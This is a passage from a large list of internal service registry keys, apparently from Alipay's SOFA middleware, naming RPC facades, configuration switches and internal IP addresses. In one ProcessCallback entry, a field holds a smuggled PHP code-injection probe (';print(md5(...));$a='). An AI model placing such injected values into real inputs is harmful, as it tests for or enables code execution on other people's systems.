ElasticService:1.0:busriskdec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.etetestcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frdspcore.common.service.facade.api.BizParaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.BackendCommonConfigService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.PrizeSendLogOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.mng.finmarket.MarketOpinionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.16.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tmobileapp.common.service.facade.login.TrustLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.callback.FinnetInfluxSettleCallbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ideploy.biz.config.accurate.AccurateManager:1.0:accurateDispatchManagerImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ins.policy.service.facade.InsElectronicEndorseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:ZmyscheckerRefreshConfigCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.activity.service.ActivityBarrageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.CommonCmdDrm.syncExecuteCmdTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.DarwinABDrmResource.sceneMappingStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.79.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bbcmng.common.service.facade.PromoFundLosePlatformInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskservice.common.service.model.probe.spi.PrePluginProbeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.inclusionconf.facade.service.console.TicketConsoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.darwin.common.service.facade.api.ExperimentAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.riskmng:name=com.alipay.riskmng.biz.crp.drm.CompositeStrategyDrmResource.drmAppName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchmobile.common.service.facade.widget.operation.AppUIFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:objectMemberApplyProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finvirtualta.common.service.facade.fund.InitLoadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.security.SecurityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.upgrade.UpgradeTo26VersionOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.robot.RobotQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.PackageBuildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.tripcoupon.facade.PublicCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.quiz.api.QuizContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.157.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.service.loan.drm.DeferOperateUtilDrm.deferDisRepayCreditAmtCheckCloseSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ordermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.cdp.mng.CdpSpaceManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.PermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.AppTairNameAdminFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_B_ENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.asset.advise.AssetFluxAdviceService:1.0:RainyTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inscharityprod.common.service.facade.PlatformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectprod.common.service.trigger.inspect.InspectFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsupport.common.service.facade.outflux.OutfluxQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dtsermng.common.service.facade.dtcrawler.DtcrawlerTaskParameterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqFinanceEventDrm.enableModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mshopprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.card.ProdCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.178.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.contentlib.common.service.facade.contentv2.FeedBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmodelcenter.common.service.api.standard.quality.IndexRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.query.PaymentQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkebankcore_enterpriseVerifyManageProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.YebsTransferOutService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.biz.censor.emcevent.CensorEmcEventManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulecenter.facade.common.RuleAnalyzeRouteService:1.0:CNCTUACCOUNTTASKRULE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobiletms.plugin.common.service.facade.api.PluginOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.chaos.dig.ChaosRiskConsultationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opscloudcore.framework.sdk.config.api.MemoryConfigFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mrchprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.query.YebsTransferOutOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.AppManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.180.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ifundcontrolmodel.service.facade.fundmodel.basic.accouting.accountsreceivable.AccountsReceivableFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","_CLIENTSERVICE_TEST_2_2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileappconfig.common.service.facade.api.AppExtManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.buc.BucUserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.distinguish.drm.ArResMngDrm.syncWhiteListName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.client.qaZQueue45#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csaccurate.service.facade.mng.api.FactorQueryService:1.0:rmaccurateService@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.ram.RoleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductManagerService:1.0:bio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.partner.api.CreditInstManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.admin.EtcDrmManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:cif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.tenant.CapCnpAgentService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.core.service.partner.PartnerProfileQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.fininfo.biz.service.impl.drm.GrayCompatibilityConfigDrm.infoIdGraySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.hisFixed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.SchedulePointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.graymng.common.service.facade.api.GrayPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.prodquery.common.service.facade.standard.api.batch.BatchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ClaimCommonDRMClient.grayPercentRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:validate_form@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.103.72.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemsgprod.common.service.facade.smart.MsgBusinessEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.CampaignManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.ApiNotifyExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.grmcore.common.service.facade.entity.EntityRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.MerchantFlagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.superapiTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.service.finscene.drm.TaskBaseControlDrm.degradeTasks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.holoxmng.monitor.service.facade.PerceptionHitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insleads.common.service.facade.InsLeadsDeliverScheduleFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiandataproc.common.service.api.InsFileTmplBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icsprod.common.service.facade.api.CategoryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.loadbalancer.LoadBalancerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.82.87.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.mwalletmng.web.infoview.drm.InfoviewResourceDRM.webCateMaxFuncCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.atd:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instbill.common.service.facade.model.api.dtbank.DtbankActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecisioncarina.service.client.playback.publish.CarinaTrProxyFacade:1.0:prodtransquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kabaocore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:testproject01@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.sql.service.DeployResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_GOTONE_CACHE_REFRESH_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finorm.finriskcenter.common.facade.api.guardian.GuardianTaskStatisticServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.PlayTemplateNodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantUserBindingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.service.api.portal.UserAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","aggrbillinfo@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insofflineinvest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.56.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:gfmac@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.clientpg.MobilePgTemplateInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.usergroup.InsIopUserGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:ipsponsorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.facade.management.InstChannelApiQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airmng.common.service.facade.temp.AirmngPlatformCompitableService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.appointment.api.AppointmentConfMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcshield.common.service.facade.testaccount.AgdsccTestAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipayplus.mobile.component.common.facade.feed.service.FeedCardOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.mng.recon.ReconManualFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:alb_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.infosec.api.InfoSecCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finfundtrade#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Sub_Servers_TP_S_xflush#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zbdm.common.service.facade.ZbdmMetaCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.baitiaoprod:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pucprod.common.service.facade.ai.AIBillRemindFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstdata.common.service.facade.service.orgconfig.PcInstInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charge.service.facade.ChargeOperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.ArOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.invoice.InvoiceOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.SeasonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.service.BPQueryService:1.0:process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.167.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityprod.common.service.facade.promotion.SecurityprodRecommendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.mobilesecurity.MobileSecurityTokenGenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.sdk.spi.service.InsIopExterfaceInvokeService:1.0:insopenprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.batchAuditStarSplitCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.ProfileViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2_dest.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.common.service.integration.mobilecodec.CodeApiGFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.rest.facade.operation.OperationAntqwriterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.69.243.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.LogControlDRM.printClearingLogRegistryLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.32.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.finsupport.component.cache.masterdata.drm.ResultStatusSwitchDRM.queryByBizResultStatusSwitchOn,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdaota@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.neardata.query.service.LayoutConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.188.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dk.common.service.facade.open.api.alarm.DkAlarmQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.extension.service.facade.api.ItemExtensionManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.ProductInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.changelog.ChangeLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.ShopPropQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.InstSignContractRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:smamlmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:dispatchApply_processCallback_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.clearingcenter.common.service.facade.api.ClearingSceneCfgService:1.0:MyBankClearingSceneCfgService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.lendpof.LoanRepayApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcbenefitcore.benefit.send@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:';print(md5(TST_test));$a='@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:creditutcoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.musedcredit.api.MuctransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.conf.AntqRoomFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromoprod.common.service.facade.trigger.FinCampTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.service.facade.api.OrderQueryByConditionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:rtask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_COMPMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.prodmng.core.service.drm.impl.AuditControlDRMImpl.createConfigId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdeduct.common.service.applepay.facade.ProvisioningBundleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zcache.tbase.poscoreTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.biz.facade.api.BizRouteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromomng.common.service.facade.api.crowd.CrowdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.ChkBalanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-peerpayprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iotcore.api.DeviceApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.allowance.facade.AllowanceDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.api.ProductDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.27.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tcc.common.service.facade.api.ModelFeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.authcenter.service.facade.HavanaLoginFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedContract2NewSyncDrmImpl.loadTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.pushSumTaskStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:activity_center_activity_audit_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.common.service.client.MobileLoginAuthReadServiceNearClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.ServicePointService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dtqualitycore.service.NodeDataSender:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdeduct.biz.agreement.internal.payauth.service.IRemotePayAuthUnitService:1.0:remotePayAuthUnitService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmRhtControlDrmResource.transferCloseOrderErrors,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dayuarkbase@DEFAUL